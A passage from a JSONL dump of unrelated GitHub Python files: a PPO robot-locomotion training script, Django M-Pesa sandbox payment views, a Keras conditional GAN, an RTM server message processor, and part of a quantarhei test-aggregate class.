int(s)\n\n\nprint(solution(\"one4seveneight\"))","repo_name":"Ohjinn/algo-py","sub_path":"programmers/level1/숫자_문자열과_영단어.py","file_name":"숫자_문자열과_영단어.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71381316965","text":"import sys\nimport os\nbase_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../')\nsys.path.append(base_dir)\nsys.path.append(os.path.join(base_dir, 'rl'))\n\nimport time\nfrom collections import deque\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport gym\ngym.logger.set_level(40)\n\nimport environments\n# from rl.train.evaluation import evaluate, render\nfrom rl.train.arguments import get_parser\nfrom rl.train.utils import solve_argv_conflict\nfrom common.common import *\nfrom rl.train.evaluation import render\n\n# import a2c_ppo_acktr\nfrom a2c_ppo_acktr import algo, utils\nfrom a2c_ppo_acktr.envs import make_vec_envs, make_env\nfrom a2c_ppo_acktr.model import Policy\nfrom a2c_ppo_acktr.storage import RolloutStorage\n\ndef train(args):\n torch.manual_seed(args.seed)\n torch.set_num_threads(1)\n device = torch.device('cpu')\n\n os.makedirs(args.save_dir, exist_ok = True)\n\n training_log_path = os.path.join(args.save_dir, 'logs.txt')\n fp_log = open(training_log_path, 'w')\n fp_log.close()\n\n envs = make_vec_envs(args.env_name, args.seed, args.num_processes, \n args.gamma, None, device, False, args = args)\n\n render_env = gym.make(args.env_name, args = args)\n render_env.seed(args.seed)\n\n actor_critic = Policy(\n envs.observation_space.shape,\n envs.action_space,\n base_kwargs={'recurrent': args.recurrent_policy})\n actor_critic.to(device)\n \n if args.algo == 'ppo':\n agent = algo.PPO(\n actor_critic,\n args.clip_param,\n args.ppo_epoch,\n args.num_mini_batch,\n args.value_loss_coef,\n args.entropy_coef,\n lr=args.lr,\n eps=args.eps,\n max_grad_norm=args.max_grad_norm)\n else:\n raise NotImplementedError\n\n rollouts = RolloutStorage(args.num_steps, args.num_processes,\n envs.observation_space.shape, envs.action_space,\n actor_critic.recurrent_hidden_state_size)\n \n obs = envs.reset()\n rollouts.obs[0].copy_(obs)\n rollouts.to(device)\n \n episode_rewards = deque(maxlen=10)\n episode_lens = deque(maxlen=10)\n\n start = time.time()\n num_updates = int(\n args.num_env_steps) // args.num_steps // args.num_processes\n for j in range(num_updates):\n\n if args.use_linear_lr_decay:\n # decrease learning rate linearly\n utils.update_linear_schedule(\n agent.optimizer, j, num_updates,\n agent.optimizer.lr if args.algo == \"acktr\" else args.lr)\n\n for step in range(args.num_steps):\n # Sample actions\n with torch.no_grad():\n value, action, action_log_prob, recurrent_hidden_states = actor_critic.act(\n rollouts.obs[step], rollouts.recurrent_hidden_states[step],\n rollouts.masks[step])\n\n # Obser reward and next obs\n obs, reward, done, infos = envs.step(action)\n \n for info in infos:\n if 'episode' in info.keys():\n episode_rewards.append(info['episode']['r'])\n episode_lens.append(info['episode']['l'])\n\n # If done then clean the history of observations.\n masks = torch.FloatTensor(\n [[0.0] if done_ else [1.0] for done_ in done])\n bad_masks = torch.FloatTensor(\n [[0.0] if 'bad_transition' in info.keys() else [1.0]\n for info in infos])\n rollouts.insert(obs, recurrent_hidden_states, action,\n action_log_prob, value, reward, masks, bad_masks)\n\n with torch.no_grad():\n next_value = actor_critic.get_value(\n rollouts.obs[-1], rollouts.recurrent_hidden_states[-1],\n rollouts.masks[-1]).detach()\n\n rollouts.compute_returns(next_value, args.use_gae, args.gamma,\n args.gae_lambda, args.use_proper_time_limits)\n\n value_loss, action_loss, dist_entropy = agent.update(rollouts)\n\n rollouts.after_update()\n\n # save for every interval-th episode or for the last epoch\n if (j % args.save_interval == 0\n or j == num_updates - 1) and args.save_dir != \"\":\n model_save_dir = os.path.join(args.save_dir, 'models')\n os.makedirs(model_save_dir, exist_ok = True)\n torch.save([\n actor_critic,\n getattr(utils.get_vec_normalize(envs), 'ob_rms', None)\n ], os.path.join(model_save_dir, args.env_name + '_iter{}'.format(j) + \".pt\"))\n\n # save logs of every episode\n fp_log = open(training_log_path, 'a')\n total_num_steps = (j + 1) * args.num_processes * args.num_steps\n len_mean, len_min, len_max = np.mean(episode_lens), np.min(episode_lens), np.max(episode_lens)\n reward_mean, reward_min, reward_max = np.mean(episode_rewards), np.min(episode_rewards), np.max(episode_rewards)\n fp_log.write('iterations: {}, mean(len): {:.1f}, min(len): {}, max(len): {}, mean(reward): {:.3f}, min(reward): {:.3f}, max(reward): {:.3f}, value_loss: {:.3f}, action_loss: {:.3f}\\n'.format(\n total_num_steps, len_mean, len_min, len_max, reward_mean, reward_min, reward_max, value_loss, action_loss))\n fp_log.close()\n\n # logging to console\n if j % args.log_interval == 0 and len(episode_rewards) > 1:\n total_num_steps = (j + 1) * args.num_processes * args.num_steps\n end = time.time()\n print(\n \"Updates {}, num timesteps {}, FPS {}, time {} minutes \\n Last {} training episodes: mean/median length {:1f}/{}, min/max length {}/{} mean/median reward {:.1f}/{:.1f}, min/max reward {:.1f}/{:.1f}\\n\"\n .format(j, total_num_steps,\n int(total_num_steps / (end - start)),\n (end - start) / 60., \n len(episode_rewards), \n np.mean(episode_lens), np.median(episode_lens), \n np.min(episode_lens), np.max(episode_lens),\n np.mean(episode_rewards), np.median(episode_rewards), \n np.min(episode_rewards), np.max(episode_rewards), \n dist_entropy, value_loss,\n action_loss))\n\n if (args.eval_interval is not None and len(episode_rewards) > 1\n and j % args.eval_interval == 0):\n ob_rms = utils.get_vec_normalize(envs).ob_rms\n evaluate(args, actor_critic, ob_rms, args.env_name, args.seed,\n args.num_processes, device)\n\n if (args.render_interval is not None and args.render_interval > 0 and j % args.render_interval == 0):\n ob_rms = utils.get_vec_normalize(envs).ob_rms\n render(render_env, actor_critic, ob_rms, deterministic = True)\n\n render_env.close()\n envs.close()\n\nif __name__ == '__main__':\n torch.set_default_dtype(torch.float64)\n args_list = ['--env-name', 'RobotLocomotion-v0',\n '--task', 'FlatTerrainTask',\n '--grammar-file', '../../data/designs/grammar_jan21.dot',\n '--algo', 'ppo',\n '--use-gae',\n '--log-interval', '5',\n '--num-steps', '1024',\n '--num-processes', '8',\n '--lr', '3e-4',\n '--entropy-coef', '0',\n '--value-loss-coef', '0.5',\n '--ppo-epoch', '10',\n '--num-mini-batch', '32',\n '--gamma', '0.995',\n '--gae-lambda', '0.95',\n '--num-env-steps', '30000000',\n '--use-linear-lr-decay',\n '--use-proper-time-limits',\n '--save-interval', '100',\n '--seed', '2',\n '--save-dir', './trained_models/RobotLocomotion-v0/test/',\n '--render-interval', '80']\n \n solve_argv_conflict(args_list)\n parser = get_parser()\n args = parser.parse_args(args_list + sys.argv[1:])\n\n args.cuda = not args.no_cuda and torch.cuda.is_available()\n\n args.save_dir = os.path.join(args.save_dir, get_time_stamp())\n try:\n os.makedirs(args.save_dir, exist_ok = True)\n except OSError:\n pass\n\n fp = open(os.path.join(args.save_dir, 'args.txt'), 'w')\n fp.write(str(args_list + sys.argv[1:]))\n fp.close()\n\n train(args)","repo_name":"allanzhao/RoboGrammar","sub_path":"examples/rl/train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8565,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"52"} +{"seq_id":"36441517279","text":"from django.shortcuts import render,redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.http import JsonResponse,HttpResponse\n\nimport requests\nimport json\n\nfrom .access_tkn_generator import generate_access_token\nfrom .credentials import bs_shortcode,lnm_passkey\nfrom .timestamp import format_time\nfrom .password_generator import decode_password\n\n\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.views import APIView\n\nfrom .models import MpesaCallBack\n\n\n\n\n\nclass LNM(APIView):\n def mpesa_payments(self, request):\n access_token = generate_access_token()\n api_url = 'https://sandbox.safaricom.co.ke/mpesa/stkpush/v1/processrequest'\n headers = {\"Authorization\": \"Bearer %s\" %access_token }\n request = { \n \"BusinessShortCode\":bs_shortcode, \n \"Password\":decode_password(), \n \"Timestamp\":format_time(), \n \"TransactionType\": \"CustomerPayBillOnline\", \n \"Amount\":\"1\", \n \"PartyA\":\"254726486929\", \n \"PartyB\":bs_shortcode, \n \"PhoneNumber\":\"254726486929\", \n \"CallBackURL\": \"https://rulibrary.herokuapp.com/api/lnm\",\n \"AccountReference\":\"Rongo University\", \n \"TransactionDesc\":\"Pay library penalties\"\n }\n response = requests.post(api_url, json=request, headers=headers) #The response can either be a succesful transaction or a failed transaction \n response_string =response.text\n res = json.loads(response_string)\n\n res_code = res['ResponseCode']\n if(res_code == '0'):\n merchant_id = res['MerchantRequestID']\n checkout_id = res['CheckoutRequestID']\n code = res['ResponseCode']\n response_des = res['ResponseDescription']\n json_format = {\n 'MerchantRequestId': merchant_id,\n 'CheckoutRequestId': checkout_id,\n 'ResponseCode':code, \n 'ResponseDescription':response_des\n }\n\n transaction= MpesaCallBack.objects.create(\n merchant_request_id = merchant_id,\n checkout_request_id = checkout_id,\n response_code = res_code,\n response_description = response_des,\n )\n\n transaction.save() \n return json_format\n \n def post(self, request, *args, **kwargs):\n payment_res = self.mpesa_payments(request)\n return render(request, 'DarajaApp/phone.html')\n\n \n\ndef updatephone(request,id):\n phone_user = User.objects.get(id=id)\n if request.method == 'POST':\n phone = request.POST['phone']\n \n if phone_user.transactiondetails_set.all():\n for amount in phone_user.transactiondetails_set.all():\n latest_amount=+amount.amount\n sent_amount = str(latest_amount)\n print(sent_amount)\n \n if len(phone) == 12 and phone.startswith(\"2547\"):\n access_token = generate_access_token()\n api_url = 'https://sandbox.safaricom.co.ke/mpesa/stkpush/v1/processrequest'\n headers = {\"Authorization\": \"Bearer %s\" %access_token }\n request = { \n \"BusinessShortCode\":bs_shortcode, \n \"Password\":decode_password(), \n \"Timestamp\":format_time(), \n \"TransactionType\": \"CustomerPayBillOnline\", \n \"Amount\":sent_amount, \n \"PartyA\":phone, \n \"PartyB\":bs_shortcode, \n \"PhoneNumber\":phone, \n \"CallBackURL\": \"https://rulibrary.herokuapp.com/api/lnm\",\n \"AccountReference\":\"Rongo University\", \n \"TransactionDesc\":\"Pay library penalties\"\n }\n response = requests.post(api_url, json=request, headers=headers) #The response can either be a succesful transaction or a failed transaction \n response_string =response.text\n res = json.loads(response_string)\n merchant_id = res['MerchantRequestID']\n checkout_id = res['CheckoutRequestID']\n code = res['ResponseCode']\n response_des = res['ResponseDescription']\n json_format = {\n 'MerchantRequestId': merchant_id,\n 'CheckoutRequestId': checkout_id,\n 'ResponseCode':code, \n 'ResponseDescription':response_des\n }\n print(json_format)\n return redirect('home-page')\n \n else:\n messages.info(request, f\"the Phone Number '{phone}' not valid or Wrong format\")\n else:\n messages.info(request, f\"No charges for {phone_user.username} \")\n return render(request, 'DarajaApp/phone.html')\n \n\n\n\n # else:\n # messages.info(request, f\"Phone Number '{phone}' not a valid kenyan number/has a wrong format\")\n \n\n\n \n\n ","repo_name":"Morvin-Ian/Learning-Resources-Aquisition","sub_path":"DarajaApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18550553236","text":"from tensorflow import keras\nimport imageio\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport os\n\nbatch_size = 20\nnum_channels = 1\nnum_classes = 4\nimage_size = 256\nlatent_dim = 256\n\nos.chdir(os.getcwd()+'/Data')\nsubmissions = pd.read_csv('submissions.csv')\namount = 10000\ndata = submissions[:amount]\nupvotes = data[\"Score\"].to_numpy()\nlogupvotes = np.log(upvotes+1)\ndata[\"Log_Upvotes\"]=logupvotes\n\nquantiles=[0.25,0.5,0.75]\nlabels=np.quantile(data[\"Log_Upvotes\"],quantiles)\n\nos.chdir(os.getcwd()+\"/resized_images256\")\nX = np.zeros((len(data),image_size,image_size))\ny=np.zeros(len(data))\nfor i, row in data.iterrows():\n temp_labels=np.append(labels,row[\"Log_Upvotes\"])\n y[i]=int(np.where(np.sort(temp_labels)==row[\"Log_Upvotes\"])[0][0])\n image = np.asarray(Image.open('EarthPorn-' + str(row[\"ID\"]) + '.jpg').convert('L'))\n X[i] = image\nprint(np.count_nonzero(y==0))\nprint(np.count_nonzero(y==1))\nprint(np.count_nonzero(y==2))\nprint(np.count_nonzero(y==3))\n\n\nX = X.astype(\"float32\") / 255.0\nX = np.reshape(X, (-1, image_size, image_size, 1))\ny = keras.utils.to_categorical(y, 4)\ndataset = tf.data.Dataset.from_tensor_slices((X, y))\ndataset = dataset.shuffle(buffer_size=1024).batch(batch_size)\n\nprint(f\"Shape of training images: {X.shape}\")\nprint(f\"Shape of training labels: {y.shape}\")\n\n\ngenerator_in_channels = latent_dim + num_classes\ndiscriminator_in_channels = num_channels + num_classes\nprint(generator_in_channels, discriminator_in_channels)\n\n#Create discriminator and generator\ngenerator = keras.Sequential(\n [\n keras.layers.InputLayer((generator_in_channels,)),\n keras.layers.Dense(8 * 8 * generator_in_channels),\n keras.layers.LeakyReLU(alpha=0.2),\n keras.layers.Reshape((8, 8, generator_in_channels)),\n keras.layers.Conv2DTranspose(128, (4, 4), strides=(2, 2), padding=\"same\"),\n keras.layers.LeakyReLU(alpha=0.2),\n keras.layers.Conv2DTranspose(128, (4, 4), strides=(2, 2), padding=\"same\"),\n keras.layers.LeakyReLU(alpha=0.2),\n keras.layers.Conv2D(1, (7, 7), padding=\"same\", activation=\"sigmoid\"),\n keras.layers.UpSampling2D(size=(8, 8)) # Adjust the upsampling size\n ],\n name=\"generator\",\n)\n\ndiscriminator = keras.Sequential(\n [\n keras.layers.InputLayer((image_size, image_size, discriminator_in_channels)),\n keras.layers.Conv2D(64, (3, 3), strides=(2, 2), padding=\"same\"),\n keras.layers.LeakyReLU(alpha=0.2),\n keras.layers.Conv2D(128, (3, 3), strides=(2, 2), padding=\"same\"),\n keras.layers.LeakyReLU(alpha=0.2),\n keras.layers.GlobalMaxPooling2D(),\n keras.layers.Dense(1),\n ],\n name=\"discriminator\",\n)\n\nclass ConditionalGAN(keras.Model):\n def __init__(self, discriminator, generator, latent_dim):\n super().__init__()\n self.discriminator = discriminator\n self.generator = generator\n self.latent_dim = latent_dim\n self.gen_loss_tracker = keras.metrics.Mean(name=\"generator_loss\")\n self.disc_loss_tracker = keras.metrics.Mean(name=\"discriminator_loss\")\n\n @property\n def metrics(self):\n return [self.gen_loss_tracker, self.disc_loss_tracker]\n\n def compile(self, d_optimizer, g_optimizer, loss_fn):\n super().compile()\n self.d_optimizer = d_optimizer\n self.g_optimizer = g_optimizer\n self.loss_fn = loss_fn\n\n def train_step(self, data):\n # Unpack the data.\n real_images, one_hot_labels = data\n\n # Add dummy dimensions to the labels so that they can be concatenated with\n # the images. This is for the discriminator.\n image_one_hot_labels = one_hot_labels[:, :, None, None]\n image_one_hot_labels = tf.repeat(\n image_one_hot_labels, repeats=[image_size * image_size]\n )\n image_one_hot_labels = tf.reshape(\n image_one_hot_labels, (-1, image_size, image_size, num_classes)\n )\n\n # Sample random points in the latent space and concatenate the labels.\n # This is for the generator.\n batch_size = tf.shape(real_images)[0]\n random_latent_vectors = tf.random.normal(shape=(batch_size, self.latent_dim))\n random_vector_labels = tf.concat(\n [random_latent_vectors, one_hot_labels], axis=1\n )\n\n # Decode the noise (guided by labels) to fake images.\n generated_images = self.generator(random_vector_labels)\n\n # Combine them with real images. Note that we are concatenating the labels\n # with these images here.\n fake_image_and_labels = tf.concat([generated_images, image_one_hot_labels], -1)\n real_image_and_labels = tf.concat([real_images, image_one_hot_labels], -1)\n combined_images = tf.concat(\n [fake_image_and_labels, real_image_and_labels], axis=0\n )\n\n # Assemble labels discriminating real from fake images.\n labels = tf.concat(\n [tf.ones((batch_size, 1)), tf.zeros((batch_size, 1))], axis=0\n )\n\n # Train the discriminator.\n with tf.GradientTape() as tape:\n predictions = self.discriminator(combined_images)\n d_loss = self.loss_fn(labels, predictions)\n grads = tape.gradient(d_loss, self.discriminator.trainable_weights)\n self.d_optimizer.apply_gradients(\n zip(grads, self.discriminator.trainable_weights)\n )\n\n # Sample random points in the latent space.\n random_latent_vectors = tf.random.normal(shape=(batch_size, self.latent_dim))\n random_vector_labels = tf.concat(\n [random_latent_vectors, one_hot_labels], axis=1\n )\n\n # Assemble labels that say \"all real images\".\n misleading_labels = tf.zeros((batch_size, 1))\n\n # Train the generator (note that we should *not* update the weights\n # of the discriminator)!\n with tf.GradientTape() as tape:\n fake_images = self.generator(random_vector_labels)\n fake_image_and_labels = tf.concat([fake_images, image_one_hot_labels], -1)\n predictions = self.discriminator(fake_image_and_labels)\n g_loss = self.loss_fn(misleading_labels, predictions)\n grads = tape.gradient(g_loss, self.generator.trainable_weights)\n self.g_optimizer.apply_gradients(zip(grads, self.generator.trainable_weights))\n\n # Monitor loss.\n self.gen_loss_tracker.update_state(g_loss)\n self.disc_loss_tracker.update_state(d_loss)\n return {\n \"g_loss\": self.gen_loss_tracker.result(),\n \"d_loss\": self.disc_loss_tracker.result(),\n }\n\n\n\ncond_gan = ConditionalGAN(\ndiscriminator=discriminator, generator=generator, latent_dim=latent_dim\n)\ncond_gan.compile(\n d_optimizer=keras.optimizers.legacy.Adam(learning_rate=0.0003),\n g_optimizer=keras.optimizers.legacy.Adam(learning_rate=0.0003),\n loss_fn=keras.losses.BinaryCrossentropy(from_logits=True),\n)\nn_epochs = 10\ncond_gan.fit(dataset, epochs=n_epochs) #,callbacks=[cbk]\n\n\n# We first extract the trained generator from our Conditional GAN.\ntrained_gen = cond_gan.generator\n\n# Generate new images using the trained generator\nnum_samples = 16\nlatent_vectors = tf.random.normal(shape=(num_samples, latent_dim))\none_hot_labels = tf.one_hot([0, 1, 2, 3], num_classes) \nrandom_vector_labels = tf.concat([latent_vectors, tf.tile(one_hot_labels, [int(num_samples/num_classes), 1])], axis=1)\ngenerated_images = trained_gen(random_vector_labels, training=False)\n\n# Rescale and plot the generated images\ngenerated_images = (generated_images * 0.5 + 0.5) * 255\nfig, axs = plt.subplots(4, 4, figsize=(10, 10))\nfor i in range(4):\n for j in range(4):\n axs[i][j].imshow(generated_images[4*i+j, :, :, 0], cmap=\"gray\")\n axs[i][j].axis(\"off\")\nplt.show()\n\n#Save images\nos.chdir(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))+\"/GAN/GAN_keras_examples\")\nfor i in range(num_samples):\n img = generated_images[i, :, :, :].numpy()\n img = keras.utils.array_to_img(img)\n img.save(\"generated_img_{i}_{epoch}.png\".format(i=i, epoch=n_epochs))\n","repo_name":"VeryThankYou/FagProject","sub_path":"GAN/Keras.py","file_name":"Keras.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13458060439","text":"# encoding=utf8\n\nimport sys\nsys.path.append(\"..\")\nimport time\nfrom fpnn import *\nfrom .rtm_server_structures import *\n\nDUP_FILTER_CLEAN_INTERVAL_SECONDS = 300\nDUP_FILTER_TRIGGER_CLEAN_COUNT = 1000\n\n\nclass DupP2PMessageKey():\n def __init__(self, sender, receiver, mid):\n self.sender = sender\n self.receiver = receiver\n self.mid = mid\n\n def __hash__(self):\n return hash(str(self.sender) + ':' + str(self.receiver) + ':' + str(self.mid))\n\n def __eq__(self, other):\n return (self.sender, self.receiver, self.mid) == (other.sender, other.receiver, other.mid)\n\n\nclass DupGroupMessageKey():\n def __init__(self, sender, group, mid):\n self.sender = sender\n self.group = group\n self.mid = mid\n\n def __hash__(self):\n return hash(str(self.sender) + ':' + str(self.group) + ':' + str(self.mid))\n\n def __eq__(self, other):\n return (self.sender, self.group, self.mid) == (other.sender, other.group, other.mid)\n\n\nclass DupRoomMessageKey():\n def __init__(self, sender, room, mid):\n self.sender = sender\n self.room = room\n self.mid = mid\n\n def __hash__(self):\n return hash(str(self.sender) + ':' + str(self.room) + ':' + str(self.mid))\n\n def __eq__(self, other):\n return (self.sender, self.room, self.mid) == (other.sender, other.room, other.mid)\n\n\nclass DupMessageFilter(object):\n def __init__(self):\n self.p2p_filter = {}\n self.group_filter = {}\n self.room_filter = {}\n\n def is_dup(self, mtype, key):\n filter_cache = None\n if mtype == 'p2p':\n filter_cache = self.p2p_filter\n elif mtype == 'group':\n filter_cache = self.group_filter\n else:\n filter_cache = self.room_filter\n now = int(time.time())\n is_dup = False\n ts = filter_cache.get(key, None)\n if ts == None:\n filter_cache[key] = now\n is_dup = False\n else:\n is_dup = True\n\n if len(filter_cache) > DUP_FILTER_TRIGGER_CLEAN_COUNT:\n threshold = now - DUP_FILTER_CLEAN_INTERVAL_SECONDS\n delete_keys = []\n for (key, value) in filter_cache.items():\n if value <= threshold:\n delete_keys.append(key)\n for key in delete_keys:\n del filter_cache[key]\n return is_dup\n\n\nclass RtmQuestProcessorInternal(QuestProcessor):\n def __init__(self):\n QuestProcessor.__init__(self)\n self.processor = None\n self.dup_filter = DupMessageFilter()\n\n def set_processor(self, processor):\n self.processor = processor\n\n def ping(self, connection, quest):\n connection.send_answer(Answer())\n self.processor.ping()\n\n def pushevent(self, connection, quest):\n connection.send_answer(Answer())\n pid = quest.get('pid', None)\n uid = quest.get('uid', None)\n event = quest.get('event', None)\n endpoint = quest.get('endpoint', None)\n time = quest.get('time', None)\n data = quest.get('data', None)\n try:\n self.processor.push_event(pid, event, uid, time, endpoint, data)\n except:\n pass\n\n def build_message(self, from_uid, to_id, mtype, mid, msg, attrs, mtime):\n message = RTMMessage()\n message.from_uid = from_uid\n message.to_id = to_id\n message.message_type = mtype\n message.message_id = mid\n message.message = msg\n message.attrs = attrs\n message.modified_time = mtime\n if 40 <= mtype <= 50:\n message = FileInfo.build_file_info(message)\n return message\n\n def pushmsg(self, connection, quest):\n connection.send_answer(Answer())\n from_uid = quest.get('from', None)\n to_uid = quest.get('to', None)\n mtype = quest.get('mtype', None)\n mid = quest.get('mid', None)\n msg = quest.get('msg', None)\n attrs = quest.get('attrs', None)\n mtime = quest.get('mtime', None)\n if not self.dup_filter.is_dup('p2p', DupP2PMessageKey(from_uid, to_uid, mid)):\n message = self.build_message(from_uid, to_uid, mtype, mid, msg, attrs, mtime)\n if mtype == ChatMessageType.TEXT.value:\n self.processor.push_chat(message)\n elif mtype == ChatMessageType.CMD.value:\n self.processor.push_cmd(message)\n elif mtype >= 40 and mtype <= 50:\n self.processor.push_file(message)\n else:\n self.processor.push_message(message)\n\n def pushgroupmsg(self, connection, quest):\n connection.send_answer(Answer())\n from_uid = quest.get('from', None)\n gid = quest.get('gid', None)\n mtype = quest.get('mtype', None)\n mid = quest.get('mid', None)\n msg = quest.get('msg', None)\n attrs = quest.get('attrs', None)\n mtime = quest.get('mtime', None)\n if not self.dup_filter.is_dup('group', DupGroupMessageKey(from_uid, gid, mid)):\n message = self.build_message(from_uid, gid, mtype, mid, msg, attrs, mtime)\n if mtype == ChatMessageType.TEXT.value:\n self.processor.push_group_chat(message)\n elif mtype == ChatMessageType.CMD.value:\n self.processor.push_group_cmd(message)\n elif mtype >= 40 and mtype <= 50:\n self.processor.push_group_file(message)\n else:\n self.processor.push_group_message(message)\n\n def pushroommsg(self, connection, quest):\n connection.send_answer(Answer())\n from_uid = quest.get('from', None)\n rid = quest.get('rid', None)\n mtype = quest.get('mtype', None)\n mid = quest.get('mid', None)\n msg = quest.get('msg', None)\n attrs = quest.get('attrs', None)\n mtime = quest.get('mtime', None)\n if not self.dup_filter.is_dup('room', DupRoomMessageKey(from_uid, rid, mid)):\n message = self.build_message(from_uid, rid, mtype, mid, msg, attrs, mtime)\n if mtype == ChatMessageType.TEXT.value:\n self.processor.push_room_chat(message)\n elif mtype == ChatMessageType.CMD.value:\n self.processor.push_room_cmd(message)\n elif mtype >= 40 and mtype <= 50:\n self.processor.push_room_file(message)\n else:\n self.processor.push_room_message(message)","repo_name":"highras/rtm-server-sdk-python","sub_path":"src/rtm/rtm_quest_processor_internal.py","file_name":"rtm_quest_processor_internal.py","file_ext":"py","file_size_in_byte":6438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9028052771","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Class to support tests on Aggregate class\n\n This class provides an easy access to a prefilled, but not initiallized\n object of the Aggregate class. These can be used for testing and \n demonstration. There are several types of aggregates available, \n distinguished by the `name` argument of the constructor.\n \n \n TestAggregates Provided \n -----------------------\n \n Below we list the valid values for the `name` argument of the TestAggregate\n constructor:\n \n dimer-2 :\n Dimer of two-level molecules, with positions in space\n and transition dipole moments specified. No environment\n is defined.\n \n dimer-2-env :\n Dimer of two-level molecules, with positions in space and\n transition dipole moments specified. For each molecule\n we define energy gap correlation function (energy gao \n correlation functions on different sites are not correlated). \n\n homodimer-2 :\n Homo-dimer of two-level molecules (molecules with the same energy \n gaps), with positions in space\n and transition dipole moments specified. No environment\n is defined.\n \n homodimer-2-env :\n Homo-dimer of two-level molecules, with positions in space and\n transition dipole moments specified. For each molecule\n we define energy gap correlation function (energy gao \n correlation functions on different sites are not correlated).\n \n Class Details\n -------------\n\n\"\"\"\n\nimport numpy\n\nfrom .aggregates import Aggregate\nfrom .molecules import Molecule\nfrom .modes import Mode\nfrom ..core.units import convert\nfrom ..core.time import TimeAxis\nfrom ..qm.corfunctions.correlationfunctions import CorrelationFunction\nfrom ..core.managers import energy_units \n\nclass TestAggregate(Aggregate):\n \"\"\"Class to support tests on Aggregate class\n \n \n Parameters\n ----------\n \n name : str\n Name characterizing the test aggregate.\n \n \n Examples\n --------\n\n General dimers\n \n >>> # Dimer of two-level systems \n >>> tagg = TestAggregate(name=\"dimer-2\")\n >>> tagg.build()\n >>> tagg.has_SystemBathInteraction()\n False\n\n \n >>> # Dimer of two-level systems with an environment\n >>> tagg = TestAggregate(name=\"dimer-2-env\")\n >>> tagg.build()\n >>> tagg.has_SystemBathInteraction()\n True\n \n Homo-dimers\n \n >>> # Dimer of two-level systems \n >>> tagg = TestAggregate(name=\"homodimer-2\")\n >>> tagg.build()\n >>> tagg.has_SystemBathInteraction()\n False\n\n \n >>> # Dimer of two-level systems with an environment\n >>> tagg = TestAggregate(name=\"homodimer-2-env\")\n >>> tagg.build()\n >>> tagg.has_SystemBathInteraction()\n True\n\n >>> # Trimer of two-level systems without an environment\n >>> tagg = TestAggregate(name=\"trimer-2\")\n >>> tagg.build()\n >>> tagg.has_SystemBathInteraction()\n False\n \n \"\"\"\n \n def __init__(self, name=None):\n \"\"\" Some more doctests\n \n >>> TestAggregate()\n Traceback (most recent call last):\n ...\n Exception: Aggregate name not specified\n \n \n \"\"\"\n \n if name is None:\n raise Exception(\"Aggregate name not specified\")\n \n \n #\n # Test dimer\n #\n if name == \"dimer-2-env\":\n \n m1, m2 = self._molecules(N=2, nst=2)\n \n # set their environment\n time = TimeAxis(0, 1000, 1.0)\n cpar = dict(ftype=\"OverdampedBrownian\", reorg=20,\n cortime=100, T=300)\n with energy_units(\"1/cm\"):\n cfce = CorrelationFunction(time, cpar)\n \n m1.set_transition_environment((0, 1), cfce)\n m2.set_transition_environment((0, 1), cfce)\n \n super().__init__(molecules=[m1, m2])\n\n elif name == \"trimer-2-env\":\n \n m1, m2, m3 = self._molecules(N=3, nst=2)\n \n # set their environment\n time = TimeAxis(0, 1000, 1.0)\n cpar = dict(ftype=\"OverdampedBrownian\", reorg=20,\n cortime=100, T=300)\n with energy_units(\"1/cm\"):\n cfce = CorrelationFunction(time, cpar)\n \n m1.set_transition_environment((0, 1), cfce)\n m2.set_transition_environment((0, 1), cfce)\n m3.set_transition_environment((0, 1), cfce)\n \n super().__init__(molecules=[m1, m2, m3])\n \n elif name == \"dimer-2\":\n \n m1, m2 = self._molecules(N=2, nst=2)\n \n # set their environment\n # nothing here\n \n super().__init__(molecules=[m1, m2])\n \n elif name == \"trimer-2\":\n \n m1, m2, m3 = self._molecules(N=3, nst=2, homo=False)\n \n super().__init__(molecules=[m1, m2, m3])\n \n elif name == \"homodimer-2-env\":\n \n m1, m2 = self._molecules(N=2, nst=2, homo=True)\n \n # set their environment\n time = TimeAxis(0, 1000, 1.0)\n cpar = dict(ftype=\"OverdampedBrownian\", reorg=20,\n cortime=100, T=300)\n with energy_units(\"1/cm\"):\n cfce = CorrelationFunction(time, cpar)\n \n m1.set_transition_environment((0, 1), cfce)\n m2.set_transition_environment((0, 1), cfce)\n \n super().__init__(molecules=[m1, m2]) \n \n elif name == \"homodimer-2\":\n \n m1, m2 = self._molecules(N=2, nst=2, homo=True)\n \n # set their environment\n # nothing here\n \n super().__init__(molecules=[m1, m2]) \n \n elif name == \"dimer-2-vib\":\n \n m1, m2 = self._molecules(N=2, nst=2)\n \n with energy_units(\"1/cm\"):\n mod1 = Mode(100.0)\n m1.add_Mode(mod1)\n mod1.set_HR(1,0.1)\n \n mod2 = Mode(100.0)\n m2.add_Mode(mod2)\n mod2.set_HR(1,0.1)\n \n super().__init__(molecules=[m1, m2]) \n \n \n def _molecules(self, N, nst, homo=False):\n \"\"\"Creates molecules to be filled into Aggregate\n \n Testing that None is returned for wrong arguments\n \n >>> tagg = TestAggregate(\"dimer-2\")\n >>> mols = tagg._molecules(3, 5)\n >>> print(mols)\n None\n \n \"\"\"\n \n if (N == 2) and (nst == 2):\n \n nstates = nst\n \n # check inputs\n if nstates != 2:\n raise Exception()\n \n # set parameters\n gap1 = convert(12000,\"1/cm\", to=\"int\")\n \n energies1 = numpy.zeros(nstates)\n for s in range(nstates):\n energies1[s] = s*gap1\n \n if homo:\n gap2 = 